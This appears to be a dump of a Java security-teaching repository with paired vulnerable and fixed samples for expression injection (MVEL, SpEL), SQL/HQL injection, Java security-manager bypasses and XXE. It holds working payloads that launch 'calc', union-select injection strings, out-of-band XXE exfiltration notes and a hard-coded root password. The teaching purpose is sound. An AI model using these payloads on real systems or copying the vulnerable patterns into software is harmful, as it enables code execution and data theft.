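     * Deletes {@code fileName} from the image directory after two checks: the extension must be
     * on the allowlist, and the resolved target must stay inside the image directory.
     *
     * @param fileName caller-supplied file name
     * @return {@code true} only if both checks passed and the file was deleted
     */
    private boolean fileDeleteWithFix(String fileName) {
        if (fileName == null) {
            System.out.println("File extension is not allow!");
            return false;
        }

        // Use the LAST dot. indexOf(".") would take the first one, and a name such as
        // 1.png.jsp would then pass the allowlist.
        int index = fileName.lastIndexOf('.');
        // A name without any dot gives -1; substring(-1) would throw, so treat it as "no extension".
        String extension = index < 0 ? "" : fileName.substring(index).toLowerCase(Locale.ROOT);
        if (!isAllowedExtension(extension)) {
            System.out.println("File extension is not allow!");
            return false;
        }

        File file;
        try {
            // Canonical form removes "." and ".." segments and resolves symbolic links.
            File baseDir = new File(IMAGE_DIR).getCanonicalFile();
            file = new File(baseDir, fileName).getCanonicalFile();
            // Path.startsWith compares whole path elements, so a sibling directory whose name
            // merely begins with the same characters does not pass.
            if (!file.toPath().startsWith(baseDir.toPath())) {
                System.out.println("File path is outside the image directory!");
                return false;
            }
        } catch (IOException e) {
            // The path could not be resolved; refuse rather than delete an unchecked target.
            System.out.println("Delete fail!");
            return false;
        }

        if (file.exists() && file.delete()) {
            System.out.println("Delete success!");
            return true;
        }
        System.out.println("Delete fail!");
        return false;
    }

    /** Returns whether {@code extension} (already lower-cased) is on the allowlist. */
    private static boolean isAllowedExtension(String extension) {
        for (String allowed : ALLOWED_EXTENSIONS) {
            if (allowed.equals(extension)) {
                return true;
            }
        }
        return false;
    }

}
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/expression/mvel/MvelTest.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.expression.mvel; 2 | 3 | import org.junit.Test; 4 | import org.mvel2.MVEL; 5 | 6 | import java.io.Serializable; 7 | import java.util.HashMap; 8 | import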
java.util.Map; 9 | 10 | public class MvelTest { 11 | public static void main(String[] args) { 12 | new MvelTest().exp(); 13 | } 14 | 15 | public void exp(){ 16 | Map vars = new HashMap(); 17 | String expression1 = "Runtime.getRuntime().exec(\"calc\")"; 18 | Serializable serializable = MVEL.compileExpression(expression1); 19 | vars.put("1",expression1); 20 | MVEL.executeExpression(serializable,vars); 21 | 22 | String expression2 = "new java.lang.ProcessBuilder(new java.lang.String[]{\"calc\"}).start()"; 23 | vars.put("2",expression2); 24 | MVEL.eval(expression2,vars); 25 | } 26 | 27 | @Test 28 | public void test(){ 29 | // 两种方式 30 | String expression1 ="foobar > 99"; 31 | Serializable compiled = MVEL.compileExpression(expression1); 32 | Map vars = new HashMap(); 33 | vars.put("foobar",new Integer(100)); 34 | 35 | Boolean result1 = (Boolean)MVEL.eval(expression1, vars); 36 | if (result1.booleanValue()) { 37 | System.out.println("Itworks!"); 38 | } 39 | 40 | Boolean result2 = (Boolean)MVEL.executeExpression(compiled, vars); 41 | if (result2.booleanValue()) { 42 | System.out.println("Itworks2!"); 43 | } 44 | 45 | 46 | } 47 | } 48 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/School.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class School { 4 | String name; 5 | SchoolMaster schoolMaster; 6 | 7 | public School(){ 8 | 9 | } 10 | 11 | public School(String name, SchoolMaster schoolMaster) { 12 | this.name = name; 13 | this.schoolMaster = schoolMaster; 14 | } 15 | 16 | public String getName() { 17 | return name; 18 | } 19 | 20 | public void setName(String name) { 21 | this.name = name; 22 | } 23 | 24 | public SchoolMaster getSchoolMaster() { 25 | return schoolMaster; 26 | } 27 | 28 | public void setSchoolMaster(SchoolMaster schoolMaster) { 29 | 
this.schoolMaster = schoolMaster; 30 | } 31 | } 32 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/SchoolMaster.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class SchoolMaster { 4 | String name; 5 | 6 | public SchoolMaster(){ 7 | 8 | } 9 | 10 | public SchoolMaster(String name) { 11 | this.name = name; 12 | } 13 | 14 | public String getName() { 15 | return name; 16 | } 17 | 18 | public void setName(String name) { 19 | this.name = name; 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/ognl/bean/Student.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.ognl.bean; 2 | 3 | public class Student { 4 | String name; 5 | School school; 6 | 7 | public Student(){ 8 | 9 | } 10 | 11 | public void takingClasses(String className){ 12 | System.out.println(this.getName() + "正在上" + className + "课..."); 13 | } 14 | 15 | public Student(String name, School school) { 16 | this.name = name; 17 | this.school = school; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public School getSchool() { 29 | return school; 30 | } 31 | 32 | public void setSchool(School school) { 33 | this.school = school; 34 | } 35 | } 36 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/expression/spel/SpelTest.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.expression.spel; 2 | 3 | import 
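org.springframework.expression.EvaluationContext; 4 | import org.springframework.expression.Expression; 5 | import org.springframework.expression.ExpressionParser; 6 | import org.springframework.expression.spel.standard.SpelExpressionParser; 7 | import org.springframework.expression.spel.support.StandardEvaluationContext; 8 | 9 | /** 10 | * 参考:https://www.freebuf.com/vuls/197008.html 11 | * */ 12 | public class SpelTest { 13 | 14 | public static void main(String[] args) { 15 | new SpelTest().exp(); 16 | } 17 | 18 | public void exp(){ 19 | // 1.创建解析器:SpEL 使用 ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现; 20 | ExpressionParser parser = new SpelExpressionParser(); 21 | // 2.解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象。 22 | Expression expression = parser.parseExpression("T(java.lang.Runtime).getRuntime().exec(\"calc\")"); 23 | // 3.构造上下文:准备比如变量定义等等表达式需要的上下文数据。 24 | EvaluationContext context = new StandardEvaluationContext(); 25 | // 4.求值:通过 Expression 接口的 getValue 方法根据上下文获得表达式值。 26 | Object value = expression.getValue(context); 27 | System.out.println(value); 28 | } 29 | }
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/HibernateSqli.java:
--------------------------------------------------------------------------------
package com.r17a.commonvuln.injection.sqli.hibernate;

import com.r17a.commonvuln.injection.sqli.hibernate.utils.HibernateUtils;
import com.r17a.commonvuln.injection.sqli.hibernate.pojo.User;
import org.hibernate.Session;
import org.hibernate.query.NativeQuery;
import org.hibernate.query.Query;

import java.util.List;

/**
 * HQL injection demo: the same lookup written once with string concatenation and once with a
 * named parameter.
 */
public class HibernateSqli {

    /**
     * Calls the concatenating variant with a value that carries its own quote and boolean
     * condition, then the parameterised variant with a plain name.
     *
     * @param args unused
     */
    public static void main(String[] args) {
        HibernateSqli hibernateSqli = new HibernateSqli();
        hibernateSqli.getUserByName("lisi' and user()='root@localhost");
        hibernateSqli.getUserByNamePrepare("lisi");
    }

    /**
     * Vulnerable variant, kept for contrast: {@code name} is pasted between quotes into the HQL
     * text, so a quote inside the value ends the literal and the remainder is parsed as query
     * syntax. Do not copy; use {@link #getUserByNamePrepare(String)}.
     *
     * @param name user name, inserted into the query text unescaped
     */
    public void getUserByName(String name) {
        Session session = HibernateUtils.getSession();
        try {
            // NOTE(security): injectable by design. The value becomes part of the statement.
            Query<User> query =
                    session.createQuery("from User where name = '" + name + "'", User.class);
            printUser(query.getSingleResult());
        } finally {
            // getSingleResult throws when the row count is not exactly one; close regardless.
            session.close();
        }
    }

    /**
     * Remediated variant: the HQL text is constant and {@code name} is bound to the
     * {@code :name} parameter, so the value is never parsed as query syntax.
     *
     * @param name user name, passed as a bound parameter
     */
    public void getUserByNamePrepare(String name) {
        Session session = HibernateUtils.getSession();
        try {
            Query<User> query = session.createQuery("from User where name = :name", User.class);
            query.setParameter("name", name);
            printUser(query.getSingleResult());
        } finally {
            session.close();
        }
    }

    /** Prints id, name and date of {@code user}, separated by dashes. */
    private static void printUser(User user) {
        System.out.println(user.getId() + "-" + user.getName() + "-" + user.getDate());
    }
}
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.hbm.xml:
--------------------------------------------------------------------------------
1 | 2 | 5 | 6 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 22 | 23 | 24 | 25 | 26 |
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/pojo/User.java:
--------------------------------------------------------------------------------
1 | package com.r17a.commonvuln.injection.sqli.hibernate.pojo; 2 | 3 | public class User { 4 | private String id; 5 | private String name; 6 | private String password; 7 | private String date; 8 | 9 | public User(){ 10 | } 11 | 12 | public String getId() { 13 | return id; 14 | } 15 | 16 | public void setId(String id) { 17 | this.id = id; 18 | } 19 | 20 | public String getName() { 21 | return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public String getPassword() { 29 | return password; 30 | } 31 | 32 | public void setPassword(String password) { 33 | this.password = password; 34 | } 35 | 36 | public String getDate() { 37 |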
return date; 38 | } 39 | 40 | public void setDate(String date) { 41 | this.date = date; 42 | } 43 | } 44 | 45 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/hibernate/utils/HibernateUtils.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.hibernate.utils; 2 | 3 | 4 | import org.hibernate.HibernateException; 5 | import org.hibernate.Session; 6 | import org.hibernate.SessionFactory; 7 | import org.hibernate.boot.registry.StandardServiceRegistryBuilder; 8 | import org.hibernate.cfg.Configuration; 9 | import org.hibernate.service.ServiceRegistry; 10 | 11 | import com.r17a.commonvuln.injection.sqli.hibernate.pojo.User; 12 | 13 | 14 | public class HibernateUtils { 15 | 16 | private static SessionFactory factory; 17 | private static ServiceRegistry serviceRegistry; 18 | static{ 19 | try{ 20 | Configuration configuration = new Configuration().configure(); 21 | 22 | configuration.addClass(User.class); 23 | 24 | serviceRegistry = new StandardServiceRegistryBuilder() 25 | .applySettings(configuration.getProperties()).build(); 26 | factory = configuration.buildSessionFactory(serviceRegistry); 27 | }catch(HibernateException e){ 28 | e.printStackTrace(); 29 | } 30 | } 31 | //返回会话工厂对象 32 | public static SessionFactory getSessionFactory(){ 33 | return factory; 34 | } 35 | //返回一个会话对象 36 | public static Session getSession(){ 37 | Session session = null; 38 | if(factory!=null) { 39 | session = factory.openSession(); 40 | } 41 | return session; 42 | } 43 | //关闭指定的会话对象 44 | public static void closeSession(Session session){ 45 | if(session!=null){ 46 | if(session.isOpen()) { 47 | session.close(); 48 | } 49 | } 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/jdbc/JdbcSqli.java: 
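--------------------------------------------------------------------------------
package com.r17a.commonvuln.injection.sqli.jdbc;

import java.sql.*;

/**
 * JDBC SQL-injection sample: {@link #selectPoc} builds the statement by concatenation,
 * {@link #selectFix} uses a {@link PreparedStatement} placeholder.
 *
 * TODO set the user name, password and MySQL address
 *
 * NOTE(review): the database account and password are hard-coded in both methods and the
 * account is root. Outside a throwaway lab, load credentials from configuration and use
 * an account limited to the tables the code needs.
 */
public class JdbcSqli {
    public static void main(String[] args) throws Exception {
        JdbcSqli demo = new JdbcSqli();
        demo.selectPoc("1 and 1=2 union select * from user");
        demo.selectFix("2' and 1=2 union select * from user where '1'='1");
    }

    /**
     * Vulnerable "before" sample, kept on purpose: {@code value} is appended to the SQL
     * text, so anything in it is executed as part of the statement.
     *
     * @param value text placed after {@code id=} in the query
     * @throws Exception if the driver cannot be loaded or the query fails
     */
    public void selectPoc(String value) throws Exception {
        final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8&useSSL=true";
        final String username = "root";
        final String password = "1qazXSW@3edc";

        // Load the driver
        Class.forName("com.mysql.cj.jdbc.Driver");
        // Build the SQL text; the concatenation is the flaw this method demonstrates.
        String sql = "select * from user where id=" + value;
        // Connect and query; try-with-resources closes result set, statement and
        // connection even when the query throws.
        try (Connection connection = DriverManager.getConnection(url, username, password);
             Statement statement = connection.createStatement();
             ResultSet resultSet = statement.executeQuery(sql)) {
            printRows(resultSet);
        }
    }

    /**
     * Fixed "after" sample: the statement text is constant and {@code value} is bound to
     * the {@code ?} placeholder, so it is handled as data only.
     *
     * @param value value compared with the {@code id} column
     * @throws Exception if the driver cannot be loaded or the query fails
     */
    public void selectFix(String value) throws Exception {
        final String url = "jdbc:mysql://localhost:3306/users?useUnicode=true&characterEncoding=UTF-8";
        final String username = "root";
        final String password = "1qazXSW@3edc";

        // Load the driver
        Class.forName("com.mysql.cj.jdbc.Driver");
        String sql = "select * from user where id=?";
        // Connect, prepare and bind; resources are closed on every path.
        try (Connection connection = DriverManager.getConnection(url, username, password);
             PreparedStatement preparedStatement = connection.prepareStatement(sql)) {
            preparedStatement.setString(1, value);
            try (ResultSet resultSet = preparedStatement.executeQuery()) {
                printRows(resultSet);
            }
        }
    }

    /** Prints the id, name, password and date columns of every row in the result set. */
    private static void printRows(ResultSet resultSet) throws SQLException {
        while (resultSet.next()) {
            System.out.println("id:" + resultSet.getObject("id"));
            System.out.println("name:" + resultSet.getObject("name"));
            System.out.println("password:" + resultSet.getObject("password"));
            System.out.println("date:" + resultSet.getObject("date"));
        }
    }
}
-------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.dao; 2 | 3 | import com.r17a.commonvuln.injection.sqli.mybatis.pojo.User; 4 | 5 | public interface UserMapper { 6 | User getById(String id); 7 | 8 | User getByIdPrepare(String id); 9 | } 10 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/dao/UserMapper.xml: -------------------------------------------------------------------------------- 1 | 2 | 5 | 6 | 7 | 10 | 13 | 16 | 19 | 22 | 23 | 24 | 25 | 28 | 34 | 37 | 49 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/pojo/User.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.pojo; 2 | 3 | public class User { 4 | private String id; 5 | private String name; 6 | private String password; 7 | private String date; 8 | 9 | public User(){ 10 | } 11 | 12 | public String getId() { 13 | return id; 14 | } 15 | 16 | public void setId(String id) { 17 | this.id = id; 18 | } 19 | 20 | public String getName() { 21 | 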
return name; 22 | } 23 | 24 | public void setName(String name) { 25 | this.name = name; 26 | } 27 | 28 | public String getPassword() { 29 | return password; 30 | } 31 | 32 | public void setPassword(String password) { 33 | this.password = password; 34 | } 35 | 36 | public String getDate() { 37 | return date; 38 | } 39 | 40 | public void setDate(String date) { 41 | this.date = date; 42 | } 43 | } 44 | 45 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/injection/sqli/mybatis/utils/MybatisUtils.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.injection.sqli.mybatis.utils; 2 | 3 | import org.apache.ibatis.io.Resources; 4 | import org.apache.ibatis.session.SqlSession; 5 | import org.apache.ibatis.session.SqlSessionFactory; 6 | import org.apache.ibatis.session.SqlSessionFactoryBuilder; 7 | 8 | import java.io.IOException; 9 | import java.io.InputStream; 10 | 11 | public class MybatisUtils { 12 | private static SqlSessionFactory sqlSessionFactory; 13 | 14 | static { 15 | try { 16 | String resource = "mybatis-config.xml"; 17 | InputStream inputStream = Resources.getResourceAsStream(resource); 18 | sqlSessionFactory = new SqlSessionFactoryBuilder().build(inputStream); 19 | } catch (IOException e) { 20 | e.printStackTrace(); 21 | } 22 | 23 | } 24 | 25 | public static SqlSession getSqlSession() { 26 | SqlSession sqlSession = sqlSessionFactory.openSession(); 27 | return sqlSession; 28 | } 29 | 30 | } 31 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/BypassByReflection.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.securitymanager; 2 | 3 | import java.lang.reflect.Method; 4 | import java.util.Map; 5 | 6 | public class BypassByReflection 
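{
    /**
     * Runs the sample under a security manager. The policy quoted in the TODO grants
     * {@code suppressAccessChecks} and {@code accessDeclaredMembers}; the class exists to
     * show why those two permissions should not be given to code that is meant to stay
     * confined.
     */
    public static void main(String[] args) {

        //TODO compile and run with: -Djava.security.manager -Djava.security.policy==bypass-by-reflection.policy
        // bypass-by-reflection.policy:
        // grant {
        //     permission java.lang.reflect.ReflectPermission "suppressAccessChecks";
        //     permission java.lang.RuntimePermission "accessDeclaredMembers";
        // };

        // executeCommandWithReflection("calc");
        exec("calc");
    }

    /**
     * Starts the command through the public {@link Runtime#exec(String)} API. Any
     * exception is printed, not rethrown.
     *
     * @param command command line to start
     */
    public static void exec(String command) {
        try {
            Runtime.getRuntime().exec(command);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    /**
     * Starts the command by calling {@code java.lang.ProcessImpl.start} through reflection
     * instead of the public API. Any exception is printed, not rethrown.
     *
     * <p>NOTE(review): this needs the two reflection permissions from the policy above.
     * On recent JDKs the strong encapsulation of {@code java.base} is expected to block
     * the {@code setAccessible} call as well, unless the package is opened explicitly.
     *
     * @param command command line to start
     */
    public static void executeCommandWithReflection(String command) {
        try {
            Class<?> processImpl = Class.forName("java.lang.ProcessImpl");
            Method start = processImpl.getDeclaredMethod("start", String[].class, Map.class, String.class, ProcessBuilder.Redirect[].class, boolean.class);
            start.setAccessible(true);
            start.invoke(processImpl, new String[]{command}, null, null, null, false);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

}
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/SetSecurityManagerNullBypass.java:
--------------------------------------------------------------------------------
package com.r17a.commonvuln.securitymissconfig.securitymanager;


import java.io.IOException;

/**
 * With a policy that grants RuntimePermission "setSecurityManager", the running code can
 * set the SecurityManager to null, after which its checks no longer run.
 * Defensive point: never grant "setSecurityManager" to code that is supposed to be
 * sandboxed.
 */
public class SetSecurityManagerNullBypass {
    public static void main(String[] args) {
        new SetSecurityManagerNullBypass().exec();
    }

    /** Removes the security manager, then starts a process; an IOException is printed. */
    private void exec() {
        //TODO compile and run with -Djava.security.manager -Djava.security.policy==your.policy
        // grant {
        //     permission java.lang.RuntimePermission "setSecurityManager";
        // };

        // Set the SecurityManager to null so that its checks are skipped
        System.setSecurityManager(null);
        // Execute the command
        Runtime runtime = Runtime.getRuntime();
        try {
            runtime.exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

}
--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/securitymanager/policy/CreatePolicy.java:
--------------------------------------------------------------------------------
package com.r17a.commonvuln.securitymissconfig.securitymanager.policy;

import java.io.*;

/**
 * Writes Java security policy files for the security-manager samples.
 *
 * NOTE(review): both methods paste their arguments into the policy text unescaped. The
 * values used here are constants; if they can ever come from outside, validate them,
 * because a double quote or brace in the input changes what the policy grants.
 */
public class CreatePolicy {
    public static void main(String[] args) {
        CreatePolicy createPolicy = new CreatePolicy();
        createPolicy.createFilePermission("E:/myTest.policy", "E:\\test.txt");
    }

    /**
     * Generates a policy file that allows reading and writing one file.
     *
     * @param policyFileName where the policy file is saved
     * @param allowFileName  the file that may be read and written
     */
    public void createFilePermission(String policyFileName, String allowFileName) {
        // Policy files use forward slashes in paths.
        String normalizedPath = allowFileName.replace("\\", "/");
        String policyContent = "grant {\n" +
                " permission java.io.FilePermission \"" + normalizedPath + "\",\"read,write\";\n" +
                "};";
        // try-with-resources closes the writer even when write() fails.
        try (FileWriter fileWriter = new FileWriter(policyFileName)) {
            fileWriter.write(policyContent);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    /**
     * Generates a policy file whose grant block contains the given permission text.
     *
     * @param permission     the permission entry to place inside the grant block
     * @param policyFileName where the policy file is saved
     */
    public void createAnyPermission(String permission, String policyFileName){
        String policyContent = "grant {\n " + permission +"\n" +"\n};";
        try (FileWriter fileWriter = new FileWriter(policyFileName)) {
            // Write the wrapped grant block; writing the bare permission text would
            // leave the file without the surrounding "grant { ... };".
            fileWriter.write(policyContent);
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

}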
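--------------------------------------------------------------------------------
/owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/DocumentBuilderXXE.java:
--------------------------------------------------------------------------------
package com.r17a.commonvuln.securitymissconfig.xxe;

import org.w3c.dom.Document;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import java.io.ByteArrayInputStream;

/**
 * XXE sample for {@link DocumentBuilderFactory}: the same payload is parsed once with a
 * default factory and once with a hardened one.
 */
public class DocumentBuilderXXE extends XXE {

    public static void main(String[] args) {
        new DocumentBuilderXXE().test();
    }

    /**
     * Vulnerable "before" sample, kept on purpose: parses {@code Payloads.FEEDBACK} with
     * a factory left at its defaults and prints the root element's text content.
     */
    @Override
    void readNoFixXxe() {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            DocumentBuilder builder = factory.newDocumentBuilder();
            ByteArrayInputStream payload = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
            Document d = builder.parse(payload);
            System.out.println(d.getDocumentElement().getTextContent());
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

    /**
     * Hardened "after" sample: parses the same payload with DOCTYPE declarations
     * disallowed and external DTD and schema access switched off. A rejected document
     * ends in the catch block, which prints the exception.
     */
    @Override
    void readWithFixXxe() {
        try {
            DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
            // FEATURE_SECURE_PROCESSING is a feature, so it goes through setFeature;
            // whether setAttribute accepts it depends on the parser implementation.
            factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
            // Same DOCTYPE ban that the SAXBuilder and SAXReader samples set.
            factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
            // An empty protocol list means no external DTD or schema may be fetched.
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
            factory.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
            DocumentBuilder builder = factory.newDocumentBuilder();
            ByteArrayInputStream payload = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes());
            Document d = builder.parse(payload);
            System.out.println(d.getDocumentElement().getTextContent());
        } catch (Exception e) {
            e.printStackTrace();
        }

    }

}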
-------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/Payloads.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | /** 4 | * from https://github.com/threedr3am/learnjavabug/tree/master/xxe/src/main/java/com/threedr3am/bug/xxe 5 | */ 6 | public interface Payloads { 7 | 8 | /** 9 | * 有回显的payload xml 10 | *

11 | * 读取文件内容 12 | */ 13 | String FEEDBACK = 14 | "" 15 | + "" 17 | + " ]>" 18 | + "&xxe;"; 19 | 20 | /** 21 | * 有回显的payload xml,带了xsl 22 | *

23 | * 读取文件内容 24 | */ 25 | String FEEDBACK_XSL = 26 | "\n" + 27 | "\n" + 29 | "]>\n" + 30 | "\n" + 31 | "\n" + 32 | " &file;\n" + 33 | ""; 34 | 35 | /** 36 | * 没有回显,只能带出去的payload xml,读取文件单行 37 | *

38 | * 读取/tmp/aaa文件内容 39 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 40 | * "> 41 | * 监听23232端口 42 | */ 43 | String NO_FEEDBACK_SINGLE_LINE = 44 | "" 45 | + "" 47 | + " " 48 | + " %remote;%all;" 49 | + "]>" 50 | + "&send;"; 51 | 52 | /** 53 | * 没有回显,只能带出去的payload xml,读取文件多行 54 | *

55 | * 读取/tmp/aaa文件内容 56 | * 127.0.0.1:80的http web服务器存放xxe.dtd文件: 57 | * "> 58 | * 监听23232端口 59 | */ 60 | String NO_FEEDBACK_MULT_LINE = 61 | "" 62 | + "" 64 | + " " 65 | + " %remote;%all;" 66 | + "]>" 67 | + "&send;"; 68 | } 69 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXBuilderXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import java.io.ByteArrayInputStream; 4 | import java.util.List; 5 | 6 | import org.jdom.Content; 7 | import org.jdom.Document; 8 | import org.jdom.Element; 9 | import org.jdom.input.SAXBuilder; 10 | 11 | public class SAXBuilderXXE extends XXE { 12 | public static void main(String[] args) { 13 | new SAXBuilderXXE().test(); 14 | } 15 | 16 | void readNoFixXxe() { 17 | try { 18 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 19 | SAXBuilder saxBuilder = new SAXBuilder(); 20 | Document document = saxBuilder.build(byteArrayInputStream); 21 | Element element = document.getRootElement(); 22 | List contents = element.getContent(); 23 | for (Content content : contents) { 24 | System.out.println(content.getValue()); 25 | } 26 | } catch (Exception e) { 27 | e.printStackTrace(); 28 | } 29 | 30 | } 31 | 32 | void readWithFixXxe() { 33 | try { 34 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 35 | SAXBuilder saxBuilder = new SAXBuilder(); 36 | saxBuilder.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 37 | saxBuilder.setFeature("http://xml.org/sax/features/external-general-entities", false); 38 | saxBuilder.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 39 | saxBuilder.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 40 | Document document = 
saxBuilder.build(byteArrayInputStream); 41 | Element element = document.getRootElement(); 42 | List contents = element.getContent(); 43 | for (Content content : contents) { 44 | System.out.println(content.getValue()); 45 | } 46 | } catch (Exception e) { 47 | e.printStackTrace(); 48 | } 49 | 50 | } 51 | } 52 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXReadXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | import org.dom4j.Document; 4 | import org.dom4j.io.SAXReader; 5 | import org.dom4j.io.XMLWriter; 6 | 7 | import java.io.ByteArrayInputStream; 8 | 9 | public class SAXReadXXE extends XXE { 10 | public static void main(String[] args) { 11 | new SAXReadXXE().test(); 12 | } 13 | 14 | @Override 15 | void readNoFixXxe() { 16 | try { 17 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 18 | SAXReader saxReader = new SAXReader(); 19 | Document doc = saxReader.read(byteArrayInputStream); 20 | XMLWriter xmlWriter = new XMLWriter(System.out); 21 | xmlWriter.write(doc); 22 | } catch (Exception e) { 23 | e.printStackTrace(); 24 | } 25 | } 26 | 27 | @Override 28 | void readWithFixXxe() { 29 | try { 30 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK.getBytes()); 31 | SAXReader saxReader = new SAXReader(); 32 | saxReader.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); 33 | saxReader.setFeature("http://xml.org/sax/features/external-general-entities", false); 34 | saxReader.setFeature("http://xml.org/sax/features/external-parameter-entities", false); 35 | saxReader.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false); 36 | Document doc = saxReader.read(byteArrayInputStream); 37 | XMLWriter xmlWriter = new XMLWriter(System.out); 
38 | xmlWriter.write(doc); 39 | } catch (Exception e) { 40 | e.printStackTrace(); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /owasp/src/main/java/com/r17a/commonvuln/securitymissconfig/xxe/SAXTransformerFactoryXXE.java: -------------------------------------------------------------------------------- 1 | package com.r17a.commonvuln.securitymissconfig.xxe; 2 | 3 | 4 | import javax.xml.XMLConstants; 5 | import javax.xml.transform.Result; 6 | import javax.xml.transform.sax.SAXTransformerFactory; 7 | import javax.xml.transform.sax.TransformerHandler; 8 | import javax.xml.transform.stream.StreamResult; 9 | import javax.xml.transform.stream.StreamSource; 10 | import java.io.ByteArrayInputStream; 11 | 12 | public class SAXTransformerFactoryXXE extends XXE { 13 | public static void main(String[] args) { 14 | new SAXTransformerFactoryXXE().test(); 15 | } 16 | 17 | @Override 18 | void readNoFixXxe() { 19 | try { 20 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.NO_FEEDBACK_SINGLE_LINE.getBytes()); 21 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 22 | StreamSource source = new StreamSource(byteArrayInputStream); 23 | TransformerHandler transformerHandler = sf.newTransformerHandler(source); 24 | // 创建Result对象,并通过transformerHandler将目的流与其关联 25 | Result result = new StreamResult(System.out); 26 | transformerHandler.setResult(result); 27 | } catch (Exception e) { 28 | e.printStackTrace(); 29 | } 30 | } 31 | 32 | @Override 33 | void readWithFixXxe() { 34 | try { 35 | ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(Payloads.FEEDBACK_XSL.getBytes()); 36 | SAXTransformerFactory sf = (SAXTransformerFactory) SAXTransformerFactory.newInstance(); 37 | 